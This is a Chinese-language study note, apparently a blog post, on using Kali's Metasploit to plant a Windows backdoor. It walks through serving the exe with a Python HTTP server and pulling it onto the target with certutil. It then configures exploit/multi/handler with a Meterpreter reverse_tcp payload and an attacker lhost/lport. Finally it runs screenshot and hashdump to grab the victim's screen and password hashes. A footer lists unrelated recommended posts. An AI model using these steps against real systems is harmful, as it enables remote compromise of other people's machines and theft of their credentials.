Kali之metasploit学习

**目标:**尝试使用metasploit制作一个windows 后门(exe文件)

一:使用metasploit生成一个exe安装包。

二、将对应的可执行文件放入到目标机

python3 -m http.server 端口号: 模块化启动一个端口。

**windows 证书管理工具:**certutil ,可以使用它来下载文件。

**例如:**certutil -urlcache -split -f http://目标ip地址:端口号

三、开启metasploit监听msfconsole

msf 的使用法则:

1.使用模块 use

2. 配置模块必选项:set

3.运行模块:run

具体实践步骤如下:

  1. 输入msfconsole进入msf6命令行

2.使用模块 并设置相关参数

bash 复制代码
# 使用 攻击/多重/句柄 
use exploit/multi/handler  

# 和之前生成exe文件的保持一致
# 设置payload
set payload windows/x64/meterpreter/reverse_tcp

# 设置ip 
set lhost 192.168.*.*

# 设置端口
set lport 9000

3.运行run

四、尝试获取目标机(windows)信息

截图命令:screenshot

密码:hashdump (当密码超过8位,且有多种元素,就无法破解了)

相关推荐
云小逸1 小时前
【nmap源码解析】Nmap OS识别核心模块深度解析:osscan2.cc源码剖析(1)
开发语言·网络·学习·nmap
JustDI-CM1 小时前
AI学习笔记-提示词工程
人工智能·笔记·学习
悟纤1 小时前
学习与专注音乐流派 (Study & Focus Music):AI 音乐创作终极指南 | Suno高级篇 | 第33篇
大数据·人工智能·深度学习·学习·suno·suno api
爱写bug的野原新之助1 小时前
加密摘要算法MD5、SHA、HMAC:学习笔记
笔记·学习
ZH15455891312 小时前
Flutter for OpenHarmony Python学习助手实战:Web开发框架应用的实现
python·学习·flutter
百锦再2 小时前
Vue高阶知识:利用 defineModel 特性开发搜索组件组合
前端·vue.js·学习·flutter·typescript·前端框架
CappuccinoRose2 小时前
JavaScript 学习文档(二)
前端·javascript·学习·数据类型·运算符·箭头函数·变量声明
A9better2 小时前
C++——不一样的I/O工具与名称空间
开发语言·c++·学习
AI职业加油站3 小时前
职业提升之路:我的大数据分析师学习与备考分享
大数据·人工智能·经验分享·学习·职场和发展·数据分析
四谎真好看3 小时前
JavaWeb学习笔记(Day13)
笔记·学习·学习笔记·javaweb